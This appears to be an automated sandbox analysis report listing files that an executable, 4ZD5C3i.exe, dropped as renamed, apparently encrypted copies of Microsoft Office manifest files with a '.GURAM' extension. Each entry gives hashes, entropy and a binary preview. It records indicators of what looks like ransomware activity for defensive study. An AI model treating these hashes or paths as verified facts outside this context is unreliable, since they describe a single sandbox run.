                                                                                                                                                                                                                                                Preview:*[.sQ-Q:...4p!.W6:....J.A.+^e.]H....O..F...)...mI.`.....A.Xq............l._X8).7.".fC.8.D..[..Q..De.$...>.....$e.../.1@.B..u.....^+..j.i.......E..........G.3f..l.(....T..2K....Sm..BG..F.......{[....*....6../".Q._...R....a..$F)...V....mLD...m.....0.u...vw......vj..C.....j...x.y%..).6..z..2:o.U........AT..g.....,M..#..w...I8".X...*.9...#.y4.........~q.g._,j..@%..n.M~.1T..u&....U....pD..%/....p.m...G.M...N......-.X .....Z...D...|...3....o....^d.v..nr.emj..3....0..:3...7sMK.-v.{...ly......&.Tb.a>..`..1{v(..7._. ......86+q.`^.~..0d...]..-.1~.x......3o.k.....Qq..qe~.C.U....|...lE..nd*...9.}..]..c.dj.=[.kL..P3....N..$.j..t...^.o.>B#m..G/l%.$....+5.1R..E....$.{..+.. .~..w..?.......k......N%:...;.WH.9....,....$......X.Y;...!.......[N-.-......p.9QW..q..t............zm./D...\=L...\G\<6..5Qj .....I..#.L.N.....,...: ...%+.y;...}?..@.hg.O...|&../.....Jb....V..W.%k0W.q..q.q..})\..iW.e0.c....$H....H...N-..EjK..[...Z2.....@!.X..Gr.6.f.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0016-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2136
                                                                                                                                                                                                                                                Entropy (8bit):7.891878257942176
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:L4qPMuFqRbzdUWS8RXZ/kxWF1tcQP4o0jZtw4y:UqPMu8RLSYZskPcle4y
                                                                                                                                                                                                                                                MD5:A4894E15DB49BCFD329AE6B6E25C8819
                                                                                                                                                                                                                                                SHA1:2F2AFE8E86E9C95A9D7AE4DB4A9E90605D85F568
                                                                                                                                                                                                                                                SHA-256:96329C44CC8CE6A223B0173DCEA9AFAE2BDFB39977C62FF70FA6DE0F70E0E2B7
                                                                                                                                                                                                                                                SHA-512:A9D968BF69430BE48BAED2F08F0A56C1F1AF870ADBD2AF382B85D01BDDA09B8111DF1355A7F59A7F10C95CD707063C4B37CBFAE99CD08864571CBC142A2451EB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:,.<.....|..C~.Fc.2d.uU..-.......'..2...0.~.h....C..C.d&.....Eo...y.. ...<p.3O....nb.....]..p\.P.X..qd.......#..87.Vc....7.R..v^.\.a/.[.n...rP..q..2...._M!....X...LR2.-&........qLR.p(.#3I.[... F?.G1J...a+..H..h$..J..]f....XG...k.e.kD.)....W....v....a..:.|.Z%.."..2.C...M~Z.[...4.......(@ ....|4......\j....%,.YE....%Z..RJ.|.I(S...DcFh..d..,.+..z....C..,..|.|i...t]...LL.......L.KS.6.R19..r&.6..xy....e.S[.@.l..>.....8.6`..:......../_C..I...D..bS.C.2..wn...Jr......6'...*E.*..+..y..c6.......N_.Z.b..4Y4...a[.......q..Q:...Q...I.5...P.).G4...L8..b.m..,......q.....o;#..=.........p'..7D&(.6`V!.C..?v.........c....Y...0.I.p{... .R.&E......h.....y.r....=0.8..U[3..uT.\.E...N3..../.K.....g........!..AH.wG...1..Xop293e..F.`.Nr.w.7....J.u...*...H]*....Ux....u.S..'3G.? ..Sl.z.B..Ue...|.2...g.)..Z.'.h...@(..w{.....(.....f.U9..;b.O..Gc.....h.c2.K..g......'...f..%.L..*.....v. %U3.+........fT?..g.....I...W.........kV.......p.D.g...%o.7..M..Eo{{...:.4.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0018-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):496765
                                                                                                                                                                                                                                                Entropy (8bit):7.623344101533141
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:d9adplPJARkwPXDCc2708/uV0NXIiZGkysi1HGshwklWaozabOGy:udzSiMZEH/OwQ0aiGy
                                                                                                                                                                                                                                                MD5:80B27D26FEF5007BCAC0D40C214B2068
                                                                                                                                                                                                                                                SHA1:5FB3EDFB5FF8021FB9CE37B4382F5819243F9B60
                                                                                                                                                                                                                                                SHA-256:685A0DD5712E280E6EB6ABB93318CC22B1E2EB352ECEDA9692077BE6AE3642BD
                                                                                                                                                                                                                                                SHA-512:B4C0753D8BF81093396CA0BC4D9E508E97E0DF78102FBCC0B766285137CEE26EBA3CA77122C56BBA4AC2F3EA157D5F085ED280D8DA7642D35B7E81E9D0DA8D0A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:1..[+....W..I..~k.>...%.>.8..q.D..A?...q....g`...\...A..is*!eD..)...6%....S.....<...IbS.."..G&...0nw.thS...}iu.n.!p3J....w.S....l..7.........4.!......) ......}..m.2....E,T.P.....x.6.c..x.'...N.a.<...YI...{..F...BW......F].D.5.....E..K^uy(vD.GA.../.........?.......X.K......0..1.....D..<..b...'...>ChsaD.u.....n.;.....%-s.?.z...g......8m5...r#.8f.Ni<.. z^G.e..Y.q.^.&..$"...&.%..>...2.r@.]&..(.\l......I.._.S...y`s.O.aN..p...~w.=.Y>u./.H=P.fG.....4.>....ti.T|.;...=.......x...{. o..D..:...8B.............UQ.+.v..U..p.5sa..^.=.!.....M-{.\..@.'r......@.=......$.U.4........#.4.k9........wi...m%f......0].......K..|x..K<he.AM.J0...A.zQ<....k.....@`#.;.4..A...C..bf.R......J._A.;..~z....P...i...(.B\...m...'N...O$....U,1>3.I.h...(...5..f*<...}..\ZK...J....g..i.>8...<o..k.;.b.2......h;...G.j..........W..F4LQ......o(.?...Q.z.>.......1.D..!-`0.v...Y..,..[..dJC...j..Y......4.L...Ym...9%.c..........h......d./m.C.Wm..@.=...B..`.S.{.......`..x...{.R..

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0018-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1996
                                                                                                                                                                                                                                                Entropy (8bit):7.895017058695003
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:CcJwNDTQkxkd1iWBxzZlyTlUgL0RT/BiI04o0jZtwm:CcJwtzWd9zZQTlUJT/p9lem
                                                                                                                                                                                                                                                MD5:9BBBE7F4D3CA121C3FE0B2E4FC4581ED
                                                                                                                                                                                                                                                SHA1:12FE2C1CD445941FC45B89403876753D6523AC47
                                                                                                                                                                                                                                                SHA-256:0D2D660D9C0732EEBE0C3DEE5EA91812BB800ACC902BF074B1E2EC6B085340D5
                                                                                                                                                                                                                                                SHA-512:DA30E7A6F269EC632A9A4784A0754FB72205CC3FF436030BA9D966B194B5E48E9890E0DC2E78CED08B412F6474ECE9EE0BB0521792AC4C1DCB5CE46EA3DF46C3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:L.T....9....#...5.x6..&.F.a.....y..|'...S.R.... ...(U.|...v.vD.\C@o.$.f.._p...M.rm.@..N. 1.}.\....Hs;.w..0...W.e>..M.!..=N..&?....SX.....R8...Xu..<...5..3.....3gg2..NO....r[H...a.3..`O..]j:Q.=.Z+C'.Z<).E.>5....Q......|..)y..0......]dz...~I.n\.6<.)..e7.0.t.Pe...y.......1.&X"....sa.........L...P7.t~..Q|bf!....f..L..X.{9...l.|:.y.+[.BMW.........l;.o.q.G.~......r.<o.........J'..!=^.......?..,:...<._:.If..r)...8.[m....<\ R1.s....J....7.;>B.....;....?.3?.e.gv..}..........~.g?.s4,.......6>1..?..@.;1..v.H..7.'.Hz. V....1...b....|..x5..@'.N/..}jn.k.....o.z.....R..{kc.Y.........T...PE.ev..?/...4M.;.Q[.<.....8a..I:=..p.....7...ta.}2.w..}.."'.(.k.gXu`....c!.... V....j.=..&...;?`.D{.....n...}... !3NF...!4..?fr!...g./q...*Q..fh..A....../.L2..-.r.L...)...9{.cF.,F.S..].$). O..7D._.j..=HV.2./@.R.%5....l.06o.s<[..2"(......h..r.E.."F0c....mL3..Z..Hh..Q>.!.......J.L'.BtQ.}....V0.&.x..R..5...s.}7tc..ZK....r..]h.f...8..O...R...:..+....<./..Y.PW..V.k.2.!...l...

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0019-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):255220
                                                                                                                                                                                                                                                Entropy (8bit):7.999375167830561
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:762xy69xnvoDLPClk/1EALkGMyurwMfvIi8Rqclnmk1ub:7q69x6PCUIGMvrwMfAiZpiy
                                                                                                                                                                                                                                                MD5:A86C6599E2A2BCCD39B63CD9C8DBC140
                                                                                                                                                                                                                                                SHA1:5380F7C8EA58EA855672F50DD3FBE894F99CD3D4
                                                                                                                                                                                                                                                SHA-256:3A2F51C3B47C5FB8F72FDA117341A56BCD29964EFB51A97E500613F07DC9D6C1
                                                                                                                                                                                                                                                SHA-512:52732CB0634AA357DDA800265056FEF6771C1605174F4B3FEABD6C626A60BE768712A04D03F95E52778DAF25F845DC7D95743D4171717CC78B41DBC6CA7A28D8
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..io..."..)..*m[.y...d...E.Xl...%%...7i6#............Nm:........5J.....C..I_.X.V......\....b9.a.#.&..Wtt..N...I..K....".D}....r..#....kF0.X.8nK..O.un.CK..*`...2..T.^....x.8.j.E7....aA1..U.....}IF..c..Ic...Z.....E...6,..K.q..?.....Z..l..@QXV.2...6&b.C?Z..Y..T....[n...-.$S........'&..dp 1.8|...=8..7.^b...`.A.+.Z._..)D.L..4..E..tR....,'...8...s.S..`...,..#..........H...3R$=.~a.......8.v..O^.k....h;...8.|..s|X.R.~..:w........A"....@....& ...`84.^.....ELuR.P..(.J...o..9r!s...y.Z.6...&w.~.h-&..:.4M.....F.,........=s.@L8..%>.dm.........uF1.......9.fNZ.1f.r.:U..QHl....*.2V7dBV...,..}..]."t....6w./..........}3b.@6...V.+h."8..'X...M..o..q.7..2../..8H..Z.W.>....U7.6Oe.Mb....g.wL..6.s....r..4yM...6.D....P.1BN..}t.u&>^Q..Iz..B.R........TkZ..f....&Z...A[.._e....WM.].k.N.X|.+..V..b.h3..z8).].%..].i..9..?..x.^.d..7..L]L..fiim>.i3N..|.`.'.V.\.7f..S.{.m.2g.o.J.x..m..Wn#E....(.e....Kf...E...F~.@.g.Zhzl.t...a7.Zhe..hmL%..*sM&..Kb..&f1.1..ymS.$#..a.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-0019-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1996
                                                                                                                                                                                                                                                Entropy (8bit):7.915289034964182
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:n5DzVWnH1F5MCVuOnEYCSTHCTogFvomaTcjrgmqcN276R7kJeiVjmJrc0YXUZtwp:n5yFuiPEgizFvor3fcw76gr4o0jZtwp
                                                                                                                                                                                                                                                MD5:8AF28AB84D9627B0F5E135A18875E8DE
                                                                                                                                                                                                                                                SHA1:BA4B181CE274628C720FC4A2FD4292DAA4721DCE
                                                                                                                                                                                                                                                SHA-256:9AEFD0552EC86E8B8DAF0689FCF471C48564AB09655DEF6EDB6CCF92CF45EB8E
                                                                                                                                                                                                                                                SHA-512:AF72B2E7F628CEC84923C88F942E8754CF1DF8FD141BC409473F5D6E80BD6F8B97C88FF0EBF13CF86C7A19DC81E8F043BC41904EE2B85C8975174910BC2241A7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....Q7b!K..Z.i...?v......q.y~".9.{.paM/..|%.|...d..$~.~.S.w.....U,s..(.G..zU...E...q....q1....$]].v%.gs...g.1.6.e7d..x...yS|>.s.Z8T[AO....6.6......BC.d.....M._J...1.. ....w.7.......n......]Q.*.s...U...<..4...)..U.....;Rz^.5.n.08.<.h.[.F...HY..".U..K2.@..Y.hA.j..4..".u.....Q.i.u..}..{..A.aD.I.f.B....%...P..)..}.I.,\.x.(}...(.u..:...we..(. ..;.3..{K...8v..-.X/+@..JoU.:-:b.=...|..T..a..ys.X......*.3.$@....[.z...zP.......ck..?..?a....s\dzYW....g...3..{_..n......E'..Y....b2...$.$..N..*...n..n..F....z.Y...=...z..C.F..W....~Y..m.R.~[TA.p..I$$..F........(..G;....i.k1...g...8"p....S\.s.....c(Oq.....C.>....t.3.~a.Y..e..&.>.. ..03m.^`.1..M..j"....r3#.w..b:~..j.L..L...n$.l........Vp.0.W...JL.....7-Z..<....sxCq].....j..Fis\md..9u}.x'....!_.b..<.e.I.E|I+....S.X6.....$^.../@x.....O.....6P#F.?B.....Vv.....<..4.......*r.9.pw...............u.(..P.L.;F.j....r..~EU..MZ......S.@..........?.Up..,,....@.#.K....k.4o.\.0"......~.Zh..j..7....>RnL....[.C..}

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-001A-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1135990
                                                                                                                                                                                                                                                Entropy (8bit):6.228890677559846
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:2nXlyaKtqoA0mEcgQIknf4hTyoeLS1OXv5:2VZ2qv0n6fgtyoeWQh
                                                                                                                                                                                                                                                MD5:76D5F34BC2F8B3456BFAB59BF7396409
                                                                                                                                                                                                                                                SHA1:61BC50C1014234A01BA83E145B0ECBE01CE87F34
                                                                                                                                                                                                                                                SHA-256:8DF2A9F1A6BD3EAAB6A055B06222037A711B3ABFF56279EA292B5CE0B02B8297
                                                                                                                                                                                                                                                SHA-512:4C21B53E7CEBD79D657E2B37974530FDEF181B9FCADFAFD2CEDA60B94710EB56D2487454D1D3FB891BEA6B6AB86030691E6A19ACC4C066B6ED044C60F0ED9D28
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......3lNt.;.:..LX.}.2E.p.l..".....5..7%V..C."n.D.|.,.k.b%.[h.yU... ..b..O.c>..\.."......q;.y3..'0..c}..^.L."......tc.)c...?.#$;.>.L......j.d.....P.x.%4\F.~7.......N\......s.N...,...T.{ ........i!..p*$.F...+.L.$..2...G...9...{...[.4..R{F.%.\r.d...D.D`.2.l..P&...\HOr......W1f...... M]....(.........:[....j.$/..\e.qC;!M......t..K.......A.'.mjJ&..Kl.TW|M\.."G..:..1F.=9.@lI.......m(..q....p..*,...f....K.t.cK...T..hx8..I.E.]e.....1..U..R..5{u....... w.f.de&.#i.9.P.0a..H.<.f.>...d.p..=....&.sq.W..Y+NyL.):_o..;#[A...m....4......O.ezc.F.o/.Bo.Edt...#.EA.M...G........s..<k9.@:].c..y.Q..u.........V..;z5..P.%...x....2.jFg......Sg..k...........\...,...f.~gI.Vl...A\.R.&.r.C.gn._>.....PPZ8...uh...q..KO.\c 3Cc.iU.}...Y-.....::.n..%.6....K#nl;Uc D...2..nE.[.`...&e..=.)%.....%-.Bj...e.....yB...+<.U..<.s.6...g./....mGd.....R.....tzYi..G..U.k)..T._..w.L.O.t.l1.[L..l.mk.v.{])<....S.....@p.&......vF..&a......w.hkh...b.~g. .....p-8..O6...(=;.>...0..I..b.....B.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-001A-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20186
                                                                                                                                                                                                                                                Entropy (8bit):7.989348069113853
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:8js4GNz/9ABvzpbauvpGF0id/M4a/4v599rsqawLs+f6inF:0XY/9kvzRauAK4v59CqaR2F
                                                                                                                                                                                                                                                MD5:FF4B2B70CC84B013FE9C11D6EE1B196B
                                                                                                                                                                                                                                                SHA1:F37C3EEFA9D500BBDA10F24A6A16AE61CC8F4C8E
                                                                                                                                                                                                                                                SHA-256:D048C31EDB19B921F9ABA399EAF24B6AA65E79E75007701124D150793DC96B1A
                                                                                                                                                                                                                                                SHA-512:04CC2F38FABFC7CE028F9E91771C0F5DE49403E47D40CDA981CB208CEC287AA3C6A1E096E33D19E4B1C410770B38AA36843474DE494E603ECDDB63B9146E20FE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...2Hy(~]a.e.....u5.X|AM._.1..^R.{Z.4]P~../.D.4e..g.QoR)S...I..OT<n.Z.c..%.....B..-. ...C..0@$F....{p..-I..4..qT..N..S...}...y............o......%..v.i.D.9.....k.;j\.[."..%g........<C6.w...N.M..#H..Y~f{........VC.j...m.x...2.e...J.n...q!.4..A...y}`.s(.c.[R..O...5-......q........<......?....=..w.D..0...%..<.....\A.....J;ID../W..]8.T..5.......F......._.^u..}.&[.9.....42.."...|..?.sP.}.D.!7..w..d......W2.Q._'.=....k.B....p..3.dN....x..?.S.T......FK..../Zc.._.`..<;..{.u.b.s.|.\j..Z|...2.....e../...Ud..a..b..K.B......jz.C.qB.I.@. yF.1...Kj......N.':A.F.......edv'+.b.......)Y....:..X..\...b9#AF.KPyP.9|t.0..w...4.-.....Q....Z...T,@..(..._.Z....:...}(...N........._(....S .+.9.R.\._#.Vd.......X.8...................aon...D....J:....89...g..\A.hO.oE..a..I[.v.%Mx..-..c..&.....V...X..2H.s.d..7g....bB..X..G...$.S4.'.}...p.._.,J....N%....QC.........F8W...Ze.......<:1......P.......+.). r_Ih.v..q.T..F.t!.;n.$..ugE.`..;,...J...........g..L.an..b.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-001B-0000-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):769438
                                                                                                                                                                                                                                                Entropy (8bit):6.898357454309555
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:wV54AVRk720KquvbqWqHQs6RPlqTvCsNOIx:qdVa63quvbcwsqtqrCBIx
                                                                                                                                                                                                                                                MD5:64D2A95A481465D1ADDE72B2EB77827E
                                                                                                                                                                                                                                                SHA1:DC04D4496F64FFF21EC9424F11EEA48B169756AF
                                                                                                                                                                                                                                                SHA-256:C9067F79C30558A2C5C695F4EE1738061B407743E4DA17B8EBF39967F295FF0F
                                                                                                                                                                                                                                                SHA-512:5613CAE90B8578E911BE9607A69652C0B719A1D24F078925FC782CDBA2A5F63D8665A85D6ADCA69777A0CBBA0287B62E52E8049D11A8E4FA65309FC24EE43A89
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.;\....qQ..B..SA|3.[..E<..&o...$B.\.R>=..d......WE#o.~J....6*.0 WU..^...V..x5..j..q...h.}..@....0$...h...e...3.......v...N....V89.>M.....g....j..{Z2..`2...*0....._.uQS....!%.h....m.....A..G..F3...-"..ziD....&pa`..L.O...j.z.I...*..E.M.....d..Y.Kf$!..&.*...]...A..c.o..!..sP...p4.U.....b..g.)......qbAj..(G\....j.>....B.E0..+..41....w..s...46.?"9W......L\.Y......j.Qle.........xh.B9b.r...C.m:.ne.['..b.z.p..B.J;l..w.i....W.<M..M..a..R.y*.....l.).a....g.....}{..J,...mw...%.o..e.t..?.1...\]^.`p....6....O..n@.=b...........XU...\.OS..}...}d.c...f...9"...|.tClc.B...\.O...ph..\7"b.$C..S*.l+...Le<....b.V..:.|..T...T....\U#.J....j..CN.U....i.`.q5.|.Cq.n../..Olm:...0.j......[...N..r..........+......r'...:8~b0......(.F.A..FD.V#...kI.....<.0..?:v.d$.I.L...._f..a..E^.9........w......_...{....lbe...m8.SfF..&.V.....].#...Q...'`...j1.$..q....:ci...+..f.M/.n.0.....g..'.L.....7...;=...Pk.X..{p.n....0l.N.I..X..i~...1..l>..2..9xX.V.6.Tg..)..;..<.<$....@..1...y...

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-001B-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1996
                                                                                                                                                                                                                                                Entropy (8bit):7.906710787248565
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:x++v5RSRtCZy1vt5LOnOpfHOQzQreTDp20YI4o0jZtwUxc:x+GROtCI1l5YOgNreh2BZleUxc
                                                                                                                                                                                                                                                MD5:8D8A0D24D1A5F19B2E041D66464910B2
                                                                                                                                                                                                                                                SHA1:0EB4437F5308C2242628F7CBAAD3DA5B7530BFF7
                                                                                                                                                                                                                                                SHA-256:7F5193C13A8BA6AAB748B33F9565359B98D2E717E1189757578B4FB95FCD1841
                                                                                                                                                                                                                                                SHA-512:ABE35A63509E5D9B0FAD4D6F755F51F2D6D287473AD3C2B3D08ED5BEC07219BABDC76B84465E17B74258B56B754E16DFCFD78C0B3B95B29700976D8513348B0D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:K3........I2..]....;.^W|`.............G+.......v....PY(|S).'..@...~%/.....'.......rD1X...Rx.TD.}|...Fc.Q.Z..."..(....S'"..0"*.88.f....?.3.... ..8.B..-J.....H...`m.T...J.^......N..-.P.xm.T...5..O..[A..^{5.r...f@{../..A......\......5$.&*.w....l..8).*h..D$.xm..c......l...........O....0..n-K./,.W.0.o.*9..}x..5za.)e.O0...B[;Z..f.Q...K.G.I.U..z+.+q..<E..l..y[.\.b....w.z..S.&w6Sw.y?....b>>..-t.......z2T..np..z..S.Y....+).O.-=x.r......Z:...o.yi...WZ6.@...9..Am.EV..Z..!9vt.0m..i4.k..W8.(...|A##/4@.p..!e.n.8 ......H.M.1Z:..~.Ed...R..k.....5..UH.c....o....jf......Gc...,..Z..D%...?4H...U.........`.K...-7..B...g.P..."..(./c..v...}.Z.A.m.....Y... j....|i=.B..3l.m..{0.3.3a-..nK..lT/...lJ[&............u....67.t(.p...E..c.3.#cJ.8.oG..W...."TM....^!_..\.)C..T....{+.!...)w....4Q,...x]...0.sA.$#.Jow.yGEW.N.r.....I&....0_R../...(H_....-.../.-Pg..A{.8P1.../..N<."..Gc.2...).]...W.3%..R..l...-...L..0.VpN.....m.\)To.Q.(..;j--w.....6..us+4r.<|O..p0`..e.....R..'{.

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-001F-0409-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2066
                                                                                                                                                                                                                                                Entropy (8bit):7.895781759871323
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:pTQsqvwwjWNmoKngyiP1KWQgbiZ6D6CbV84o0jZtwfW:tQN3Gc5g/6YlefW
                                                                                                                                                                                                                                                MD5:F6FA7AFA9683F7005CE95371D4D302C2
                                                                                                                                                                                                                                                SHA1:24DB160061BA3EFEBE4B70803548FCB646B276D2
                                                                                                                                                                                                                                                SHA-256:CDBEFCAF00CC6824F900D3921FFFCCB534906EE4BCF61F19E3EB001DEF48156E
                                                                                                                                                                                                                                                SHA-512:809AA5F9DD64F06C0F358767415DE140DE1C378395B0A022F294272BDAD51CC4723723D7C40F8D93F205EDD18429C37DEB44679EE7FFA57F16324799D2875FC5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:{O..K....%<.......(..T?...!.(R2.t.{vj.v^........j.B../../j*...(._R._.,.......Z....h.a&..^.....h.V...Y.\/.<E...l.Q......<.]...L..V..6..j.F.b..W...W^}r.../NA5r.....q....c.i...k.,9[...x....U...N[S...Ee".)`.W...=..a."s...o..r..I:w. 2;.7.........H.g\...)..Y....%...D*-.%q..&...B5..F.v.q6.z....Zf=..D.r)...?5.=.h}..r\q.U..7.k(....<.o.EW(o.......(H.>:.n........_.........M7I.A..4w].fO...M).?.....Y....D.<). ...Q....PaE... .q.iG...#.;Y+9U.\...E.?..l.?.....8.T..5....>^o.u.(2..76......f..]..........b"Rp..V......C.;]Vc..4...[....!..)845U...#...o.C... .hL.Q.T...6R..'...<S|......H..~Bb..7g....HN..j.,.+.?..l......./......U.......&.S.n..6.M.../..$...}.F.l.1.O...n...H&.u..B/y. ..D..Z.f..%....yhi....E..WR.i$3.?Ey.....5*h.0xQw..yQ.]?...;.w.sAqsct.e...jG.....r..........#...I...A...F..p..6{RA..5.W.z.K...A^Q1.1.HZ&$.....v7.>.h.....A.>..5..]..)../....T......".d....[on.....LL....b......I...2......{..k.N.......{9!..&.@>.Jg..@.O..z.X2._~....}nW.6..I..S....

                                                                                                                                                                                                                                                C:\Program Files (x86)\microsoft office\PackageManifests\AppXManifest.90160000-001F-040C-0000-0000000FF1CE.xml.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2952
                                                                                                                                                                                                                                                Entropy (8bit):7.93075834797274
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:OdkQ1fwxHhKkq2pSLXxyPpIm5q/BYMyD4o0jZtwvh:QkQ1fwZ1q2QXYPGmcpYMXlevh
                                                                                                                                                                                                                                                MD5:2C4D425F1D257DC0748F3AE010B197F5
                                                                                                                                                                                                                                                SHA1:5CC9891FE753DF8F7E2C1E77850F14E91580FFAB
                                                                                                                                                                                                                                                SHA-256:609566441CDABD45A3C705EEABDD20D07AC3C16FC40312AD0EFE67FA07EF7E83
                                                                                                                                                                                                                                                SHA-512:9928272475B7A77595F3153A4A80935014B92613FAA401E2E2AFAA66CE740087C11DEA0397045E02644A43E97328C5910BB26869BA3A268305650C53BF4DF920
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
